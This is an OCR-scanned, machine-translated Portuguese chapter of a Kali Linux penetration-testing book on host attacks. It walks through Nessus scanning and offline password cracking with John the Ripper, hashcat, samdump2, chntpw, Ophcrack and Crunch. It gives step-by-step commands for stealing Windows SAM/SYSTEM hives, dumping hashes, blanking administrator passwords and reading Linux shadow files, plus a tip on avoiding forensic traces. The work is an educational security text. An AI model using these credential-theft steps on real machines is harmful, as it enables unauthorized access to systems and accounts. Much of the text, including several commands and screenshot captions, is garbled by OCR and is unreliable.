>. > Modelos de Digitalização 
e Nova digitalização para criar uma nova verificação. 


© New Scan 


Run Now 
Extemal Network Scan 


Choose File | do file ct 


Create Scan Canos 


Depois de selecionar Criar Digitalização, a digitalização vai lançar no horário agendado. O padrão 
cronograma será executado de imediato, por isso, na maioria dos casos, o exame vai começar a 
funcionar imediatamente. 


Nessus un: 


‘ 


& Listing Scans 


Chuo entra 


Após a verificação for concluída, os resultados podem ser vistos clicando no Resultados guia. 
Isto irá fornecer ao administrador um relatório do que o Nessus encontrado. 


NESSUS winerabiity scanner 


saut Sans lompintnss 
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Podemos examinar os exames concluídos, bem como quaisquer resultados obtidos até o 


momento, em qualquer 
varreduras ativas, como mostra a imagem a seguir: 


Sect tiylieggeicom 


Como um verificador da penetração, você quer prestar atenção a quaisquer vulnerabilidades. 
Vulnerabilidades identificadas pelo seu patch ou vulnerabilidade referência Microsoft 

número pode ser pesquisada no âmbito Metasploit usar um exploit em um 

alvo host. Consulte Capítulo 3, os ataques do lado do servidor, sobre como utilizar o Metasploit 
para 

mais informações. 


Vulnerability Summary 


= 
- 


t Wren ws DO WVereratitas Soros Cos 


viria Server Seres Crates Pe 


a 


PS mirtaie Sane Ove es 


“ 


o 


ES E 
Emil yore 
| edi | =) 
| est | : 


O exemplo anterior mostra algumas vulnerabilidades extremamente perigosas (não 

se preocupe, nós voltamos e corrigido dos sistemas). Todas estas vulnerabilidades pode ser 

usada para explorar um sistema usando Metasploit ou outras ferramentas de ataque. Para mais 
informações sobre a exploração 

vulnerabilidades encontradas pelo Nessus, consulte Metasploit em Capítulo 3, os ataques do lado do 
servidor. [150] 
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Nessus oferece opções para exportar detalhes sobre as vulnerabilidades identificadas. Você pode 
resultados de exportação como HTML, CSV, PDF, e muitos outros tipos de arquivos comuns. Para 
exportar 

resultados, vá para o Resultados seção e selecionar uma varredura completa. A terceira aba na 
esquerda oferece opções para exportar scans, como mostrado nas duas imagens seguintes: 


Export Scan Results 


O Export Resuts 


Nessus Exportação de 
digitalização 


Obtenção e rachaduras senhas de usuários 


Quebra de senha por definição, é a recuperação de senhas a partir de dados que tem sido 
armazenados ou transmitidos por um sistema de computador. As senhas são usadas para proteger 
vários 

tipos de sistema, o que temos abordadas no Capítulo 3, os ataques do lado do servidor, enquanto 
atacar servidores web. 


Os sistemas host são geralmente baseados em Linux e Windows ou ter características específicas 
a respeito de como eles armazenar e proteger senhas de usuários. Esta seção se concentrará 

em rachar arquivos de senha do sistema host. Nós incluímos isso no Aplicação Web 

Teste de Invasão livro, porque os sistemas de acolhimento é um cliente autorizado comum 
aplicações web. Comprometer um cliente significa abrir uma porta de acesso a um alvo 

aplicação web. 


O método mais fácil de obter senhas de usuários é por meio de engenharia social. Como 
descrito anteriormente, um hacker poderia obter senhas ou pistas de como senhas 

são criados, colocando como um sujeito autorizado. Por exemplo, a identificação de que todos 
senhas devem ter entre 6-10 caracteres, começar com uma letra maiúscula e termina com 

um número reduz drasticamente o número de resultados possíveis de um hacker 

precisa para tentar quebrar uma senha. (Kali oferece uma ferramenta chamada Crunch que faz 
gerando uma lista de senhas para este tipo de ataque extremamente fácil). 
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Um verificador da penetração experiente deve usar técnicas de reconhecimento apresentados em 
Capítulo 

2, reconhecimento, para identificar os tipos de sistema, possíveis políticas de senha, as pessoas 
envolvidas 

com os sistemas de administração e outras informações que ajudam a diminuir a 


PRS GAG ST AS TERA AAT QUE REFS PAM AEE Estes sao listados como se segue: 


e Adivinha: Acho manualmente usando informações obtidas sobre um alvo 


e Ataque de dicionário: Use um ataque automatizado que tenta todos os possíveis 
palavras do dicionário 


e Brute-force: Tente todas as combinações possíveis de caracteres 


e Híbrido: Combinando dicionário com força bruta 


As senhas devem ser armazenados de modo que os sistemas possam verificar a identidade de um 
usuário e acesso 

direitos. Sistemas não armazenar senhas em arquivos de texto simples, por razões óbvias de 
segurança. 

A maioria dos sistemas não usam criptografia como o único meio para proteger senhas, porque um 


Ea DO CR O Be TERRE TP HAIL E ARLS Ga LIME ALS AMAR ética, 


8? completamente diferente. Hash é irreversível e produz o mesmo 
valor para uma chave inserida, o que significa um hash podem ser armazenados e verificados contra 
um 
introduzido uma senha para verificar a autenticidade. Mudando um fator, como fazer uma carta 
de capital ou adicionar um espaço, gera uma saída de hash completamente diferente. 


Os hashes podem ser brute-forçados como uma senha se você sabe a fórmula para a geração de 
um Hash. Muitas ferramentas de quebra de senhas, como John the Ripper é capaz de 

detectar um hash e de força bruta ataca todas as combinações de saída de hash com 

saídas de hash gerado automaticamente. Uma vez que uma correspondência for encontrada, John 
the Ripper irá imprimir 

a senha de texto simples usado para gerar o hash correspondente. 


Tabelas do arco-íris é o pior adversário para algoritmos de hash comuns. Arco-íris 

tabelas são uma base de dados pré-calculado de todas as saídas de hash que podem ser 
pesquisados 

para identificar uma saída de hash. Sites como www.freerainbowtables.com oferta 

versões para os algoritmos de hash populares, tais como MD5 encontrados na maioria dos sistemas 
Windows. 


Kali também oferece aplica des como Rain owCrack Usado para gga as tabelas.do arco-íris. 
alga um hash toi criado como uma forma de combater as tabelas “do arco-iris, adicionando 


pedaços personalizados adicionais para mudar a saída de um hash para algo não encontrado 
em tabelas comuns do arco-íris. Infelizmente, muitos sistemas, como o Windows fazer 
não usar hash salgado. 
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As senhas do Windows 


Windows é o sistema operacional mais utilizado por empresas no mundo todo. 

Microsoft tem tido uma estrada rochosa sobre senhas que protegem. O actual 

Os produtos da Microsoft são muito mais seguras do que as versões mais antigas, no entanto, 
eles são 

ainda vulnerável a ataques de muitas ferramentas oferecidas em Kali. 


Windows armazena senhas na SAM (Sistema Gestão de Contas) registro 

arquivo. A exceção a isso é quando Active Directory é usado. Um Active Directory é 

um sistema de autenticação separado que armazena senhas em um banco de dados LDAP. O SAM 
arquivo está localizado em C: \ <systemroot> \ sys32 \ config. 


O SAM arquivo armazena as senhas em um formato de hash usando o LM e NTLM de hash 

para aumentar a segurança para o arquivo protegido. O SAM arquivo não pode ser movido ou 
copiado enquanto 

Windows está em execução. O SAM arquivo pode ser despejado, exibindo os hashes de senha 
que pode ser movido fora do ar por uma ferramenta de força bruta de crack. Um hacker também 
pode obter o 

SAM arquivo inicializando um sistema operacional diferente, montagem C: \, Iniciar uma distribuição 
Linux em 
i FARNgAAINeRHA BarM Ue IPRA Ge \GBystlarsennita repair pasta. 

A cópia de segurança SAM arquivo é criado por padrão e, normalmente, não excluídos pelo sistema 
administradores. O arquivo de backup está desprotegido, mas comprimido, o que significa que 
você 

deve descompactar o arquivo para obter os arquivos de hash. Você pode usar o utilitário de 
expandir-se para 

fazer isso. O comando é Expandir [FILE] [DESTINO]. Aqui está um exemplo de 


expansão do SAM arquivo para o descomprimida SAM arquivo. 
C: \> expandir SAM uncompressedS AM 


Para aumentar a segurança de hackers desligada, Microsoft Windows 2000 e 

versões mais recentes incluem um SYSKEY utilidade. O SYSKEY utilitário criptografa o hash 
senhas no SAM arquivo usando a chave de criptografia de 128 bits, que é um diferente 
chave para cada instalação. 


Um invasor com acesso físico a um sistema Windows podem obter o SYSKEY 
(Também chamada a tecla de arranque), usando os passos seguintes: 
1. Iniciando um outro sistema operacional (como Kali). 
2. Roubando a SAM e SISTEMA urticária (C: \ <systemroot> \ sys32 \ config). 
3. Recuperando-se a chave de inicialização do SISTEMA colmeia usando bkreg ou bkhive. 
4. Despejar os hashes de senha. 


5. Quebrá-las off-line com uma ferramenta como o John the Ripper. 
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Note que se você acessar um arquivo no Windows, você modificar o MAC (modificar, 
q £ acesso e mudança), que é a forma como o Windows registra sua presença. Para evitar 
Y> deixando evidências forenses, recomenda-se a copiar o host de destino 
sistema antes de lançar ataques. 


Montagem do Windows 


Existem ferramentas disponíveis para a captura do Windows SAM e SYSKEY arquivos. Um 
método para capturar esses arquivos é a montagem do sistema de destino do Windows para que 
O 

outras ferramentas podem acessar esses arquivos, enquanto a Microsoft Windows nao esta em 


EXBFHSEPO passo consiste em usar o fdisk-| comando para identificar suas partições. Você deve 
identificar o Windows e tipos de partição. O fdisk resultado mostra uma partição NTFS, 
como se segue: 


Blocos Dispositivo Boot Início Fim Sistema Id 

/ Dev/hdb1 * 1 2432 19535008 + 86 NTFS 

/ Dev/hdb2 2433 2554 979965 82 Linux swap / Solaris 
/ Dev/hdb3 2555 6202 29302560 83 Linux 


Crie um ponto de montagem utilizando o comando mkdir / mnt / windows. 
Monte o sistema do Windows usando o comando como mostrado no exemplo a seguir: 


mount-t <WindowsType> <Windows partition> / mnt / windows 


-~# mkdir /mnt/windows 


# mount -t ntfs-3q /dev/habl/mnt windows 


Agora que o seu alvo do sistema Windows é montado, você pode copiar o SAM e 
SISTEMA arquivos em seu diretório ataque usando o seguinte comando: 


cp SAM SYSTEM / pentest / passwords / AttackDirectory 


Existem ferramentas disponíveis para despejar o SAM arquivo. PwDump e Caim e Abel 
são apenas alguns exemplos. Kali ofertas samdump mostrado, na seção de ferramentas de senha 
deste capítulo. 


: Note que você vai precisar para recuperar tanto o Bootkey e SAM arquivos. 
a, O Bootkey arquivo é usado para acessar o SAM arquivo. Ferramentas utilizadas para 

Qe acessar O 

SAM arquivo exigirá a Bootkey arquivo. 
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bkreg e bkhive são ferramentas populares que podem obter a Bootkey apresentar, como mostrado na 
tela a seguir: 


Default 


Bootkey: 


Senhas Linux 


Sistemas host Linux nao sao tao comuns como o Windows e representam um desafio diferente 

para a obtenção de acesso root. Muitos sistemas podem ter as senhas armazenadas em claro 
quando auto-login está habilitado, como o . Netrc arquivos usados para Telnet e FTP. Para 

a maioria dos ataques, você vai querer capturar 0 passwd e sombra arquivos armazenados comumente 
em / Etc / passwd e / Etc / shadow. 


O sombra arquivo pode ser lido apenas pelo root e, normalmente um hash MD5. O sombra 
arquivo é mais difícil de entender do que uma janela de SAM arquivo. Existem métodos de captura 
o sombra arquivo usando carregadores de inicialização como larva. 


Quebrando uma senha Linux é similar a outros sistemas, como o Windows. A maioria 
híbridas automatizado programas de cracking, como John the Ripper pode identificar o tipo 
de haxixe e ataque de força bruta a sombra senhas com o dicionário direita. 


Kali quebra de senha ferramentas 


Kali oferece diversos utilitários para burlar a segurança da senha. Ferramentas de quebra de senha 
pode 

ser encontrado em Ataques senha e divide-se em ferramentas utilizadas para off-line e on-line 
ataques. Esta seção irá focar em ferramentas utilizadas para sistemas host de compromisso durante 
uma 

aplicação Web Penetration Test. Há outras ferramentas disponíveis no Kali, como ferramentas 
projetado para quebrar senhas de protocolos sem fio, no entanto, que está fora do escopo 

neste texto. 


[155] 


Ataques do lado do cliente 


É £ Note-se que John a linha de comando Ripper e Hydra estavam cobertos de 
Y> Capítulo 3, os ataques do lado do servidor. 


Johnny 


Johnny é uma interface gráfica para o John muito popular a ferramenta quebra de senha Ripper. Nós 
cobriu a versão de linha de comando tradicional de John the Ripper é Capítulo 3, Servidor- 

Ataques laterais. Tal como a versão de linha de comando, Johnny tem vários mecanismos que 
permitem 

ele para quebrar diferentes tipos de senhas, incluindo senhas criptografadas e hash. 

Johnny tem a capacidade de detectar automaticamente a maioria dos hashes e senhas 
criptografadas, tornando 

o processo mais fácil para os testadores de penetração. Atacantes como a ferramenta, pois é muito 
customizável e pode ser configurado em uma variedade de maneiras diferentes de aceleração 
quebra de senha. 


iz ri Algumas personalizações podem não estar disponíveis em Johnny. Recomenda-se o 
Qa> versao de linha de comando, John the Ripper, para a maioria dos ataques. 


John the Ripper funciona da seguinte maneira: 


e As tentativas de cracking de senhas com palavras de dicionário 


e Usa dicionário palavras com caracteres alfanuméricos e anexado 
preconfinado 


e Coloca dicionário palavras juntas 
e | Adiciona caracteres alfanuméricos para combinar palavras 
* Executa palavras de dicionário com caracteres especiais misturados 


* Quando tudo mais falhar, as tentativas de força 
bruta. 
Para usar Johnny, vá para Ataques senha |Ataques offline e selecione Johnny. 
Clique em Abrir Arquivo de senhas e selecione o arquivo de senha que deseja crack. 
A figura a seguir mostra um sombra arquivo com os usuários BOB, mary, e joey 
como os alvos. 
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O Senha guia será preenchida como Johnny rachaduras as senhas. 
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15742:0:99999:7: 
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15742:0:99999;? 
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15742:0.99993:7: 
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15742:049999:7: 


742:099999:7 


1577 yO:39993:7: 
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Johnny tem guias de configuração no lado esquerdo. O Opções guia é onde você seleciona 


o tipo de ataque. A figura a seguir mostra uma definição do padrão 


comportamento e as opções para selecionar o tipo de hash. Detecção automática de Johnny é 


normalmente 90 por cento correto. 


x Johnny 


Passwords 


StaDstics 


A 


Settings 


General options 
Format: 

Mode selection and settings 
© Default behaviour 

© "Single crack" mode 

© Wordlist mode 
O "incrementa!" mode 
O External mode 


Default behaviour | "Single crack" mode Wardlist mode 
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With default behaviour john tse Ripper wil run “single crack” mode, then wordist mode, then “Incremental mode. Al wit) default settings. 


Ataques do lado do cliente 


O Estatística guia exibe quanto tempo Johnny tem funcionado uma sessão ativa. 
O Configurações guia especifica como Johnny será executado, como mostrado no exemplo a 
seguir: 


Note-se que as configurações padrão para o caminho para John the Ripper pode não sr 
correta. Certifique-se de verificar o caminho para John the Ripper sob Configurações. 
Em versões mais antigas do BackTrack, descobrimos que você tem que atualizar o 
caminho 

manualmente / Pentest / passwords / john / john. Kali 1.0 padrão é / 

user / sbin / john. 


x= Johnny 


o Reset Settings back to saved state | 
Passwords a 


| Fill Settings with default values | 
Path to John the Ripper executable: /pentestipasswords/ohryjahn z Browse | 


Opuons Time interval in seconds between cracked passwords picking | 600 a 
«ul (edit john.conf respectively): - -l 


Statistics. RI Apply Settings as Soon as they are changed | Apply Settings but do NOT SAVE them | 


| Apply and Save Settings | 


O Saída guia mostra o que Johnny está atacando. Você também vai encontrar erro 
mensagens e atualizações sobre o status de uma sessão de ataque. O exemplo a seguir 
mostra uma mensagem que apresenta Johnny identificar o tipo de hash: 


Waming: detected hash type “sha512crypt”, but the string is also recognized as “crypt” 
Use the "--format=crypt” option to force loading these as that type instead 


uch file or directory 


John the Ripper e listas de palavras-padrão da sua interface gráfica é muito limitada. Nós 
recomendamos o uso de uma lista maior, que pode ser encontrada através de pesquisa on-line. 
Para usar um 

wordlist costume, vá para o Opções guia e selecione Modo Wordlist. Navegue até o seu 

lista de palavras personalizada e clique em Aplicar. 
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General options 
Format Auto detect 


Mode selection and settings 
C Default behaviour 

el 4 O "Single crack” mode 

O Wordlist mode 

C “incremental” mode 

C External mode 


 Detauit behaviour “Single crack” mode | Wordlist mode | incrementa" mode External mode. 


Wordist mode uses Gate from meridia file. As an addition rules could De applied. Section “Wordist would be used to mange molds aith 
res 


Statistics 


Wordlist file: frootiDesktopwordlist ist le | Browse 


[| Use extemal mode, filter name: 


Johnny vai preencher as células de senha ao lado de nomes como senhas estão rachados. O 
imagem seguinte mostra dois dos três senhas rachado: 


| $6$NihLh9Ovs$ peHqQGuU.. 15771:0:99993:7::: 
| S6S6mNj7TNdstYkH! 3k. 15771:0:99993:7: 


| $6$uqEpDbnE$/qe4|VGa... |15772:0:99999:7::: 


75% (3/4: 3 cracked, 1 left) [] 


hashcat e oclHashcat 


hashcat 


advanced 


password 
recovery 


hashcat e oclHashcat são utilitários cracker de senha. oclHashcat é um GPGPU- 

versão baseada. Os utilitários hashcat / oclHashcat são ferramentas que podem lidar com multithread 
múltiplas hashes e listas de senhas durante uma sessão de ataque único. O hashcat / 

utilitários oclHashcat oferecem muitas opções de ataque, como a força bruta, combinador, 

dicionário, híbrido, máscara, e os ataques baseados em regras. 
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Ataques do lado do cliente 


BackTrack oferece muitas versões de hashcat encontrado em Privilege Escalation 

|Ataques senha |Ataques offline. O cl "ocl", ou aberto, é aberto 

implementação de unificar os drivers da Nvidia e ATI GPU. Algumas versões podem 

não funcionar mesmo depois de atualizar BackTrack. Pode ser necessário fazer o download da 
atualiza 

versões de www.hashcat.net. 


Para usar hashcat, abra o aplicativo hashcat ou navegue até Ataques senha 
|Ataques offline |nashcat. 


Para usar hashcat em um documento, tipo hashcat [opções] hashfile 
[WORDFiles | diretórios. O exemplo a seguir mostra hashcat a execução de um 
lista de palavras contra um sombra arquivo: 


Initializing hashcat vê 


hashcat oferece uma interface gráfica, bem como, que funciona como um frontend para o CLI. 
Algumas pessoas gostam 


isso, porque é simples de usar e inclui a exibição o código de linha de comando no 
janela inferior. 


tasca > Pasto at fair postes te 


Hash Phe ce hash: Cx (took has sé gs05 Oodata- pinia hes 
F Rereyes hash from has het once fes cracked Wyre eo Dhaest 


Word inte 


y Datoak hatha gue DS @\odHashcat piir apie dict 


Mode: Straçhe 
ses Asame charset is pes hes 
O Usa rudes fios Amra må & pann he 


7 hish pistu es bestis nie 


Pezasces 
FU stinty 


SU desce 

f Arta recovered hashes to hte 
GPU verted tues 

arheat-phaleces ple"D0. hash cut Open... 
GFUlmos 


Pame: hash conde] plan - 


FU wanted 


agert sãos! 


at acata sé -phads coe -raare —ndes-fãa D toda hate dus 0. 5. Dfocttashest- pha ruber bert: 
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samdump2 


samdump2 é um utilitário que despeja os hashes de senha do Microsoft Windows a partir de 
umaSAM ficheiro de modo a que eles possam ser quebrada por uma ferramenta desligada. Para 
as versões mais recentes do 

Windows, você vai precisar de uma ferramenta para capturar o SYSKEY Arquivo (chave de 
inicialização) para 


iAV oy NES RARAS IR ABM LASS AHA ques offline |samdump2. 


Quando você abre samdump, Um Terminal janela pop-up. 


isamdump2 1.1.1 by Objectif Securite 
nttp://wew.objectif-securite.ch 
original author: ncuomo@studenti.unina.it 


Jsage: 
samoump? samhive keyfile 


Você deve montar o seu alvo de sistema do Windows, de modo que samdump pode acessar o SAM 
arquivo. 


mnt/wai 


Em seguida, copie o SAM e SISTEMA arquivos em seu diretório ataque. 
cp do sistema SAM / root / AttackDirectory 


Navegue até o diretório ataque e emissão bkhive bootkey SISTEMA para se obter o 
bootkey. Copie o bootkey em um arquivo de texto para que samdump tem o SAM arquivo com 
bootkey. 


cd / root / AttackDirectory> windowshashfiles.txt 


Executar samdump usando 0 samdump SAM bootkey comando. Copie a saída 
em um segundo arquivo de texto. 


Samdump2 SAM bootkey> windowshashfiles2.txt 


Agora, use uma ferramenta de quebra de senha, como John the Ripper para quebrar os 
hashes! 


chntpw 


chntpw é uma ferramenta on Kali Linux, Backtrack, e outras distribuições Linux que redefine 
senhas locais no Windows 8 e versões anteriores do Windows. Ele modifica o 

Banco de dados de senha do Windows. Esta ferramenta é utilizada principalmente para a obtenção 
no Windows 

caixas quando vocé nao sabe a senha. 
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Ataques do lado do cliente 


Para usar chntpw, Arrancar a máquina Windows com o Live CD do Kali. Para baixar 
Kali Linux, va para o http:/www.kali.org/downloads/ e baixar a imagem ISO. 


Queime o ISO em um CD e iniciar a máquina Windows com o CD ao vivo. Na inicialização 
menu para Kali, selecione Forensics opção. 


AMIDO 


Boot menu 


Live (686-—pae 
Live (686 pae failsafe) 


Install 
Graphical install 
Install with speech synthesis 


Press ENTER to boot or TAB to edit a mem entry 


O SAM arquivo geralmente esta localizado sob / Windows/System32/config. Vocé vai precisar de 
para navegar no Terminal tela para este diretório. Em seu sistema, pode parecer 
algo como isto: 


/ Media/hdal/Windows/System32/config 


Cada sistema pode ser ligeiramente diferente. Neste exemplo, Kali parece estar a usar o 
número de série do meu disco rígido como a localização do dispositivo. Isso é porque eu tenha 
inicializado 

de uma máquina virtual Windows 7 com o Live CD do Kali. O SAM base de dados é geralmente 
no / Media /name of hard drive / Windows/System32/config. 


o | [<> 
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A captura de tela a seguir lista o SAM arquivo de banco de dados no meu disco 
rígido: 


O comando chntpw-l SAM irá listar todos os nomes de usuários que estão contidos em 
o sistema Windows. A figura a seguir mostra o resultado da execução do 
comando chntpw-l SAM: 


O comando dá-nos uma lista de nomes de usuários no sistema. Quando temos a 
username queremos modificar, corremos o comando chntpw-u "username" SAM. 


Neste exemplo, temos digitado chntpw-u "Administrador" SAM, e temos a 
seguinte menu: 


Agora temos a opção de limpar a senha, alterar a senha, ou 

promovendo o usuário administrador. Alterando a senha nem sempre funciona 

em sistemas Windows 7, por isso recomendamos limpar a senha. Ao fazer isso, você 
será capaz de entrar no sistema alvo com uma senha em branco. 
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Ataques do lado do cliente 


Para acessar chntpw, Vá para o Ataques senha |Ataques offline |chntpw. ATerminal 
janela se abrirá, mostrando a tela de boas-vindas para chntpw. Existem alguns 
maneiras de usar chntpw, como descrito na página de destino principal da seguinte forma: 


Para usar o modo interativo, tipo chntpw-i eo caminho para o SAM arquivo. Se o destino 
é um sistema montado, você terá de especificar a localização da SAM arquivo dentro do 


diretório montado. 


Um menu irá aparecer oferecendo opções para alterar o SAM arquivo. Você pode selecionar 


opção 1em branco a palavra-passe. 


Homedir rea 
juplicate | Normal account 
Domain trust ac [| | Wes trust act 
Pwd don't expir Auto lockout 
(unknown 0x10) unknown Ox 20) 
count: O, wha!) tries 1s: 


Failed logis 
Total logis 


e max 
count: 25 

Edit 
Clear (blank) 
Edit (set 
Promote user 
Lhlock and 
Quit editing user 


Iq] >f 


He nu 


USEI 


ser 


password 


user password (careful 
(make user an administrator) 
enable user account obab ly 
back to select 


new) 


ser 
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Passwd not 
NMS account 
trust 
(unknown 
uNnkKnden 


Srw 


with this 


Locked now] 
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Ophcrack 


Ophcrack é um cracker de senha do Windows com base em tabelas do arco-íris. Kali oferece uma CLI 
e versao GUI. Ophcrack pode importar hashes de uma variedade de formatos, incluindo 

despejo diretamente do SAM arquivos do Windows. O seguinte mostra imagem de tela 

alguns dos formatos disponiveis para carregar em Ophcrack: 


Po ; 
Vv Oo A 
Tables Crack Help Exit 


Preferences 


sirane AN NPR, SD 


Preload: | waiting Brute force: | waiting Pwd found: 00 | Time elapsed: | 0homos | 


Ophcrack vem com built-in tabelas do arco-íris, como mostrado no exemplo a seguir. Nós 
recomendável carregar as tabelas mais recentes do arco-íris ao invés de usar as tabelas padrão. 
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Ataques do lado do cliente 


Tabelas do arco-íris estão disponíveis a partir de fontes online, como o site do desenvolvedor 
http://ophcrack.sourceforge.net/tables.php. 


exPfreetast not installe 
o XP free small not installe 


@ XP special ot installe 
è XP german vl not installe 
e XP german v2 ot installe 
O Vista special not installe 
o Vista free iot installe 
è Vista nine not installe 
o vista eight iot instale 
è Vista num not installe 
o Vista seven ot instale 
o XP flash nat installe 
o Vista Gig? XL iot installe 


p o) 
e=enabled ə =d5abled & =not installed 


aj v| o|] | instan |] 


|Preload: | waiting | Bruteforce: waiting | Pwd found: 00 | Timeclapsed: | 0h om 0s 


Para acessar ophcrack, ir a Ataques senha |Ataques offline e selecione o 

CLI ou versão GUI. Clique em Carga, e selecione o caminho para o arquivo que você deseja 
quebrar 

(Por exemplo, um Windows SAM arquivo). 


Applications Places g EJ Sun Jul Z1, 2:065 PM 


ophcrack 


f. y Q sin Q 


- 


lõid Delete Save Tables Crack Help 


Single hash 
Preferences 
PAW DUMP file 


Session file st Hash NT Hash LM Pwd 1 LM Pwd 2 


| opted poate c7eS0tb3c2 rot found Litt not foun 
pa mad o ds cd é a ma 


*disabled® JicdicteOd) empty 
HelpAsentant ee09d2bdd... 743352035. rot found net fourd not found 


*disabled® $c739857c not found 


Directory Status Progress 
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Para este exemplo, foi utilizado o Kali ISO em uma máquina Windows e inicializado em Kali 
Forensics modo. Nós ler a / Windows/system32/config diretório para chegar ao 

o SAM base de dados. Você pode aprender mais sobre como usar Kali Linux no Forensics modo 
em Capítulo 7, contramedidas defensivas, deste livro. Você também pode usar uma cópia offline 


do SAM banco de dados diretamente com Kali. 


Sun Jul 21, 2:07 PM 


Select the directory containing the encrypted SAM and SYSTEM files. 


4 CF4SB8BF456875E4 WINDOWS | systemj2 | config Create Folder 


Places Name Modified 


s Search ima systempí ofile 05/09/2013 


«> Recently Used 


B De sx! op 
j File System 
Floppy Drive 


— 43 GB Filesy 


Cancel Open 
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Ataques do lado do cliente 


Você deverá ver o hash com o nome de usuário e ID de usuário. Clique no Fenda botão 
e esperar para a senha. 


oO O A 


Stop Helg Ext 
Progress | Statistics 


er LM Hast 


| Supervise 

toto 

Acminsireror g S 

Philgpe S05{797Gd... b31¢46019.. IASON empt maison 
| Guest Su5d42542... NMigdkZal Fa di \ Dio piP Pa 


cs30457 ite 
a!Jaalbfca. 
ASIA 


Directory St Pragress 


mnvestita 


mnvestaia 22% In RAM 
= in RAM 

13%. in RAM 

metita 10% In RAM 


see 


Preload Brute force Pwd found ses lime eapsect Uh 2m 38s 


Crunch 


Crunch é uma ferramenta usada para gerar listas de senhas. Isto pode ser extremamente util se você 
são capazes de reunir informações sobre a forma como o seu alvo cria senhas. Por exemplo, se 
você capturar duas senhas e observe o alvo usa uma fase seguido por acaso 

dígitos, trituragao pode ser utilizada para gerar rapidamente uma lista de que frase seguido por todo o 
possíveis dígitos aleatórios. 


e runch version 3.4 


Crunch can create a wordlist based on criteria you specify. The outout from cm 
nch can bo sent to the screen, file, or to another progran, 


Usage; crunch <mine <cmax> [options] 
where min and nax ara numbers 


Ploase rofer to the man page for instructions and examples on how to use crunch. 
i—# E 
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Crunch tem caracteres especiais que se traduzem para o seguinte: 


e  @: Insere caracteres minúsculos 
e %:Os números de inserções 
e  ,: Caracteres maiúsculos Inserções 


e 4: Símbolos Inserções 


Para este exemplo, vamos supor que conhecemos nossos usos alvo passar seguido por dois 
caracteres desconhecidos em sua senha. Para executar Crunch para uma senha de seis caracteres 
tendo passagem seguido de dois números desconhecidos, uso %% para representar qualquer 
número. 

Para executar este e colocar a saída em um arquivo de texto cnamado newpasswordlist.txt, Utilizar o 
exemplo de entrada: 


q crunch 6 6 -t pass**% >> newpasswordList.txt 
will now generate the following amount of data: 


crunch will now generate the following number 


O arquivo de texto de saída conterá todas as possíveis combinações de números. A sequência 
imagem mostra a parte superior do arquivo de saída: 


newpasswordlist.txt 


File Edit Search Options Help 


nw 


mu 


Da 
a 


e 
as 


Cc 
+ 
q 


O uq 
i 
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Ataques do lado do cliente 


Para adicionar todas as letras minúsculas, use triturar 6 6-t passagem seguido pela O @ representando 
todas as letras minúsculas, como mostrado no exemplo a seguir: 


Agora o arquivo de texto tem todas as letras minúsculas e números, como mostrado 
na 
seguinte exemplo: 


newpasswordlist.txt 


File Edit Search Options Help 


Outras ferramentas disponiveis no 


Kigdin outras ferramentas úteis encontrados em Kali. Nós limitamos a lista de utilitários que 

auxiliar comprometer sistemas host que acessam servidores de aplicativos web. Tem 

outras ferramentas de quebra de senhas disponíveis em Kali não mostradas nesta lista, no entanto, o 
foco dessas ferramentas está fora do escopo deste texto. 


Hash-identificador 


Hash-identificador é um utilitário Python usado para identificar os tipos de hash. Mais password 
ferramentas de cracking, como John the Ripper incluir uma função de detecção automática para 
hashes 

que são muito bons e provavelmente 90 por cento preciso. Esta utilidade pode ser utilizado para 
verificar um tipo de hash manualmente. Para usar Hash-identificador, execute o utilitário e colá-lo 
em 


uma cópia do hash. [170] 
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A figura a seguir mostra uma saída de um hash: 


4 Terminal Help 


Essas as ss Ss a dis Sais ads da Sd o SRS Ad o ai SRS DAS AS a ER Ras Edi ap a ee ee 


a ada Sd Dea Erê a ad a e ER aaa Dn i 


dictstat 


dictstat é um utilitário de script Python utilizado para análise dos resultados de cracking de senha 
ou para 

uma análise wordlist regular. dictstat irá analisar os resultados e fornecer máscaras para 

-bruta forçando combinações de senha que já foram quebrados. Esta vontade 

provável fornecer pistas para rachar mais hashes em grupo. Isto pode ser útil 

quando o direcionamento de uma empresa com uma política de senha. A figura a seguir 

mostra 0 dictstat tela inicial: 


es D W A G 


Ataques do lado do cliente 


Para executar dictstat, Tipo dictstat [opções] passwords.txt. A sequência 
imagem mostra um exemplo do uso dictstat: 


RainbowCrack (rcracki mt) 


RainbowCrack é o programa de quebra de hash que gera tabelas do arco-íris para ser 

usado em quebra de senha. RainbowCrack é diferente do que a força bruta padrão 

abordagem usando grandes tabelas pré-computadas para reduzir o período de tempo necessário 
para 

quebrar uma senha. RainbowCrack é uma aplicação decente, no entanto, há muitos 

Rainbow Tables gratuitos disponíveis para download, como www freerainbowtables.com. 


A figura a seguir mostra a RainbowCrack tela inicial: 
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findmyhash 


findmyhash é um script Python, que usa um serviço online gratuito para quebrar hashes. 
Você deve ter acesso à Internet antes de usar esta ferramenta. A figura a seguir 
espetáculos findmyhash a execução de um hash MD5 contra vários sites: 


phrasendrescher 


phrasendrescher é um passe frase processamento multi-modular e rachaduras ferramenta. 
phrasendrescher vem com uma série de plugins, bem como API que permite 
desenvolvimento de novos plugins. 


CmosPwd 


CmosPwd é usado para quebrar a BIOS (Básico Input Output System) senha. 
CmosPwd permite apagar / kill, backup e restaurar o CMOS. 
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creddump 


creddump é uma ferramenta de python para extrair várias credenciais e segredos do Windows 
ramos de registo. creddump pode extrair LM e NT hashes (SYSKEY protegida), armazenada em cache 
senhas de domínio e segredos LSA. 


Resumo 


Os sistemas host são uma fonte autorizada que acessar aplicações web. Comprometedor 
um recurso autorizado poderia dar um verificador da penetração aprovado acesso a um alvo 
aplicação web. Este conceito é muitas vezes esquecido quando Teste de Invasão 
aplicações web. 


Neste capítulo, abordamos vários métodos para obter acesso não autorizado ao anfitrião 

sistemas. O foco está usando engenharia social, identificando os hosts vulneráveis e 

rachaduras senhas. Há muitos livros disponíveis que incidem sobre hacking anfitrião 

sistemas, que poderiam ser úteis quando alavancado com os temas abordados neste livro. 

Nós limitado o escopo deste capítulo para a segmentação de hosts, especificamente, que o acesso à 
web 

aplicações. 


O próximo capítulo irá cobrir atacando como anfitriões autenticar para aplicações web. 
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Atacando Autenticação 


Autenticação é o ato de confirmação da confiança da própria identidade. Isso pode envolver 
confirmar a identidade de uma pessoa, programa ou hardware, tais como a verificação Joseph 
Muniz é um funcionário do governo, bem como o seu laptop é emitido pelo governo 

agência. Como um verificador da penetração, é valioso para ser capaz de ganhar a confiança de um 
sistema de 

e segurança de bypass como uma entidade autorizada. 


O Certified Information Systems Security Professional Currículo (CISSP) 
